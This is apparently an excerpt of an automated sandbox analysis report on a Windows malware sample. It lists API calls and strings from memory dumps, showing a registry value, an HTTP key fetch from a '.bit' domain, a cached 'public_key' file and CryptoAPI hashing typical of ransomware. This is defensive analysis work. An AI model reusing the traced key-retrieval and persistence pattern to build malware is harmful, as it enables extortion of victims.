                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2158581194-0
                                                                                                  • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                  • Instruction ID: 1871a2ee2d164ca76feab61da9219b4b767679b9976d6ffa90f906164473caa4
                                                                                                  • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                  • Instruction Fuzzy Hash: 53B0127198830C33DE113642EC03F053F0C4740F54F200071FA0C1C5E1A593B96041CD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetVersionExA.KERNEL32(00000094), ref: 004F1983
                                                                                                  • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 004F1994
                                                                                                  • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004F19A1
                                                                                                  • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004F19AE
                                                                                                  • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004F19E8
                                                                                                  • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004F19FB
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 004F1AC5
                                                                                                  • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 004F1ADB
                                                                                                  • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 004F1AEE
                                                                                                  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004F1B01
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 004F1C15
                                                                                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004F1C36
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 004F1C50
                                                                                                  • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 004F1C63
                                                                                                  • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 004F1C76
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 004F1D45
                                                                                                  • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 004F1D73
                                                                                                  • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 004F1D86
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32First), ref: 004F1D99
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32Next), ref: 004F1DAC
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 004F1DBF
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 004F1DD2
                                                                                                  • GetProcAddress.KERNEL32(?,Process32First), ref: 004F1DE5
                                                                                                  • GetProcAddress.KERNEL32(?,Process32Next), ref: 004F1DF8
                                                                                                  • GetProcAddress.KERNEL32(?,Thread32First), ref: 004F1E0B
                                                                                                  • GetProcAddress.KERNEL32(?,Thread32Next), ref: 004F1E1E
                                                                                                  • GetProcAddress.KERNEL32(?,Module32First), ref: 004F1E31
                                                                                                  • GetProcAddress.KERNEL32(?,Module32Next), ref: 004F1E44
                                                                                                  • GetTickCount.KERNEL32 ref: 004F1F03
                                                                                                  • GetTickCount.KERNEL32 ref: 004F1FF1
                                                                                                  • GetTickCount.KERNEL32 ref: 004F2066
                                                                                                  • GetTickCount.KERNEL32 ref: 004F2095
                                                                                                  • GetTickCount.KERNEL32 ref: 004F20FB
                                                                                                  • GetTickCount.KERNEL32 ref: 004F2118
                                                                                                  • GetTickCount.KERNEL32 ref: 004F2187
                                                                                                  • GetTickCount.KERNEL32 ref: 004F21A4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                                                                                  • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                  • API String ID: 842291066-1723836103
                                                                                                  • Opcode ID: fb24ad7b842d92ffbbda6647df9524b971936cd2ec8e427a75cd04ef0293d611
                                                                                                  • Instruction ID: 5eef3a0702531f6153c0a61ec6f267db6b79776719a51e14698406b924935571
                                                                                                  • Opcode Fuzzy Hash: fb24ad7b842d92ffbbda6647df9524b971936cd2ec8e427a75cd04ef0293d611
                                                                                                  • Instruction Fuzzy Hash: 0D3251B1E0022D9ADF609F64CD45BAEBA79FF45704F0041EAA60CE7251EB748E84CF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM(?,?,?,?,?,0053B3EC,000000FF), ref: 0048E6C0
                                                                                                    • Part of subcall function 0047C6A0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0047C6C2
                                                                                                    • Part of subcall function 0047C6A0: RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0047C6F3
                                                                                                    • Part of subcall function 0047C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0047C700
                                                                                                  • _memset.LIBCMT ref: 0048E707
                                                                                                    • Part of subcall function 0047C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047C51B
                                                                                                  • InternetOpenW.WININET ref: 0048E743
                                                                                                  • _wcsstr.LIBCMT ref: 0048E7AE
                                                                                                  • _memmove.LIBCMT ref: 0048E838
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0048E90A
                                                                                                  • lstrcatW.KERNEL32(?,&first=false), ref: 0048E93D
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0048E954
                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0048E96F
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048E98C
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048E9A3
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0048E9CD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0048E9F3
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0048E9F6
                                                                                                  • _strstr.LIBCMT ref: 0048EA36
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048EA59
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048EA74
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0048EA82
                                                                                                  • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0048EA92
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EAA4
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EABA
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048EAC8
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 0048EAE3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EB5B
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048EB7C
                                                                                                  • _malloc.LIBCMT ref: 0048EB86
                                                                                                  • _memset.LIBCMT ref: 0048EB94
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0048EBAE
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EBB6
                                                                                                  • _strstr.LIBCMT ref: 0048EBDA
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048EC00
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048EC24
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0048EC32
                                                                                                  • lstrlenW.KERNEL32(?), ref: 0048EC3E
                                                                                                  • lstrlenA.KERNEL32(","id":"), ref: 0048EC51
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EC6D
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0048EC7F
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048EC93
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 0048ECB3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048ED2A
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0048ED4B
                                                                                                  • _malloc.LIBCMT ref: 0048ED55
                                                                                                  • _memset.LIBCMT ref: 0048ED63
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0048ED7D
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048ED85
                                                                                                  • lstrlenW.KERNEL32(?), ref: 0048EDA3
                                                                                                  • lstrlenW.KERNEL32(?), ref: 0048EDAE
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0048EDD3
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0048EDF7
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0048EE05
                                                                                                  • _free.LIBCMT ref: 0048EE15
                                                                                                  • _free.LIBCMT ref: 0048EE22
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EF61
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048EFBF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                  • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                  • API String ID: 704684250-3586605218
                                                                                                  • Opcode ID: ac86580e6f99b18e605f2da2541e7b123e5db2cc864d7fcff36f4f2ed704cd09
                                                                                                  • Instruction ID: 0d8c3bd5e19994704a6460f4dcd9889fbeb7706e0082bf87bae6851b8080a411
                                                                                                  • Opcode Fuzzy Hash: ac86580e6f99b18e605f2da2541e7b123e5db2cc864d7fcff36f4f2ed704cd09
                                                                                                  • Instruction Fuzzy Hash: 9F42D371508341ABDB20EF25CC49B9F7BE8BF55308F000D2EF58597292DB79A509CB96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _wcsstr.LIBCMT ref: 0047DD8D
                                                                                                  • _wcsstr.LIBCMT ref: 0047DDB6
                                                                                                  • _memset.LIBCMT ref: 0047DDE4
                                                                                                  • lstrlenW.KERNEL32(?), ref: 0047DE0A
                                                                                                  • gethostbyname.WS2_32(00570134), ref: 0047DEA7
                                                                                                  • inet_ntoa.WS2_32(?), ref: 0047DEC7
                                                                                                    • Part of subcall function 004BF26C: std::exception::exception.LIBCMT ref: 004BF27F
                                                                                                    • Part of subcall function 004BF26C: __CxxThrowException@8.LIBCMT ref: 004BF294
                                                                                                    • Part of subcall function 004BF26C: std::exception::exception.LIBCMT ref: 004BF2AD
                                                                                                    • Part of subcall function 004BF26C: __CxxThrowException@8.LIBCMT ref: 004BF2C2
                                                                                                    • Part of subcall function 004BF26C: std::regex_error::regex_error.LIBCPMT ref: 004BF2D4
                                                                                                    • Part of subcall function 004BF26C: __CxxThrowException@8.LIBCMT ref: 004BF2E2
                                                                                                    • Part of subcall function 004BF26C: std::exception::exception.LIBCMT ref: 004BF2FB
                                                                                                    • Part of subcall function 004BF26C: __CxxThrowException@8.LIBCMT ref: 004BF310
                                                                                                  • _memmove.LIBCMT ref: 0047DF8C
                                                                                                  • _memmove.LIBCMT ref: 0047DFFC
                                                                                                  • _wcsstr.LIBCMT ref: 0047E06C
                                                                                                  • LocalAlloc.KERNEL32(00000040,00000008), ref: 0047E07E
                                                                                                  • inet_addr.WS2_32(?), ref: 0047E0C1
                                                                                                  • DnsQuery_W.DNSAPI(?,00000002,00000002,?,?,00000000), ref: 0047E0E5
                                                                                                  • inet_ntoa.WS2_32(?), ref: 0047E103
                                                                                                  • _memmove.LIBCMT ref: 0047E33B
                                                                                                  • _memmove.LIBCMT ref: 0047E40F
                                                                                                  • LocalFree.KERNEL32(?), ref: 0047E495
                                                                                                  • DnsFree.DNSAPI(?,00000001), ref: 0047E4A0
                                                                                                  • _memset.LIBCMT ref: 0047E4BC
                                                                                                  • lstrcpyW.KERNEL32(?,http://), ref: 0047E4D0
                                                                                                  • lstrcatW.KERNEL32(?,00000000), ref: 0047E523
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0047E549
                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0047E56A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw_memmove$_wcsstrlstrcatstd::exception::exception$FreeLocal_memsetinet_ntoa$AllocQuery_gethostbynameinet_addrlstrcpylstrlenstd::regex_error::regex_error
                                                                                                  • String ID: http://$https://$invalid string position$vector<T> too long
                                                                                                  • API String ID: 2428799424-3687932381
                                                                                                  • Opcode ID: 9fef4bbd4bb41ca8f2d21f12c4de5572d1e726f22712a2c4389ecd645101b1bd
                                                                                                  • Instruction ID: 0e8b70edcaccf99f6518c1386397d3a4266b551909704ab2dfbd2154bb73070e
                                                                                                  • Opcode Fuzzy Hash: 9fef4bbd4bb41ca8f2d21f12c4de5572d1e726f22712a2c4389ecd645101b1bd
                                                                                                  • Instruction Fuzzy Hash: FA52CE71A002099FCF24CF69C8857EEBBF5BF09304F1486AAE809AB341D7799945CB95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00481010
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00481026
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,?,<yW,?,?,?,?,?,00493B9C,?,0057793C,?,00000001), ref: 004A0F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0048103B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00481051
                                                                                                  • lstrlenA.KERNEL32(?,00000000), ref: 00481059
                                                                                                  • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00481064
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0048107A
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00481099
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004810AB
                                                                                                  • _memset.LIBCMT ref: 004810CA
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004810DE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004810F0
                                                                                                  • _malloc.LIBCMT ref: 00481100
                                                                                                  • _memset.LIBCMT ref: 0048110B
                                                                                                  • _sprintf.LIBCMT ref: 0048112E
                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0048113C
                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00481154
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0048115F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                  • String ID: %.2X
                                                                                                  • API String ID: 2451520719-213608013
                                                                                                  • Opcode ID: 5875c48d1dca3041a7014368b5623e30d2f45a45b3c81568967a3bd26f92a3cf
                                                                                                  • Instruction ID: d41f32797efb5935eba595f10b286636d336b0f6bdedaf8aa163d4008a927693
                                                                                                  • Opcode Fuzzy Hash: 5875c48d1dca3041a7014368b5623e30d2f45a45b3c81568967a3bd26f92a3cf
                                                                                                  • Instruction Fuzzy Hash: AE519071D40209ABDF10EBA0DC4AFEFBFB8FB15704F10002AF905B6290D77959059BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32 ref: 00481915
                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00481932
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00481941
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00481948
                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00481956
                                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00481962
                                                                                                  • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00481974
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 0048198B
                                                                                                  • lstrcatW.KERNEL32(00000000,00570260), ref: 00481993
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 00481999
                                                                                                  • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004819A3
                                                                                                  • _memset.LIBCMT ref: 004819B8
                                                                                                  • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004819DC
                                                                                                    • Part of subcall function 00482BA0: lstrlenW.KERNEL32(?), ref: 00482BC9
                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00481A01
                                                                                                  • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00481A04
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                  • String ID: failed with error
                                                                                                  • API String ID: 4182478520-946485432
                                                                                                  • Opcode ID: fe70443b6e26d4eb3308c3cc11599f99da4fc86e196ec84fd936b3d7bf8641e7
                                                                                                  • Instruction ID: 1722a50d65cdcf6e46b7e5c9ad20cb9f4428960c960d82dcec4e8998b6e30dc1
                                                                                                  • Opcode Fuzzy Hash: fe70443b6e26d4eb3308c3cc11599f99da4fc86e196ec84fd936b3d7bf8641e7
                                                                                                  • Instruction Fuzzy Hash: 8421F632A40218B7D7117B619C4AF6E3E7CEF85B11F100056FA05B6291DE782E45EBE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00481AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00481ACA
                                                                                                    • Part of subcall function 00481AB0: DispatchMessageW.USER32(?), ref: 00481AE0
                                                                                                    • Part of subcall function 00481AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00481AEE
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0047F900
                                                                                                  • _memmove.LIBCMT ref: 0047F9EA
                                                                                                  • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0047FA51
                                                                                                  • _memmove.LIBCMT ref: 0047FADA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 273148273-0
                                                                                                  • Opcode ID: b5af12291ca21a5a3577edf2d6d1a1e065fb17d0ea8c11e2c82c141cfbe32c87
                                                                                                  • Instruction ID: 89c35870a8934aa77e8bff596743ee0181b7c7f53b052b0187e2ece4051ae687
                                                                                                  • Opcode Fuzzy Hash: b5af12291ca21a5a3577edf2d6d1a1e065fb17d0ea8c11e2c82c141cfbe32c87
                                                                                                  • Instruction Fuzzy Hash: 0952C271D00208DFDF10DFA8C985BDEBBF4BF05308F10856AE419A7251E779AA49CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0056FCA4,00000000,00000000), ref: 0047E8CE
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047E8E4
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,?,<yW,?,?,?,?,?,00493B9C,?,0057793C,?,00000001), ref: 004A0F1F
                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0047E8F9
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047E90F
                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0047E928
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047E93E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0047E95D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047E96F
                                                                                                  • _memset.LIBCMT ref: 0047E98E
                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0047E9A2
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0047E9B4
                                                                                                  • _sprintf.LIBCMT ref: 0047E9D3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
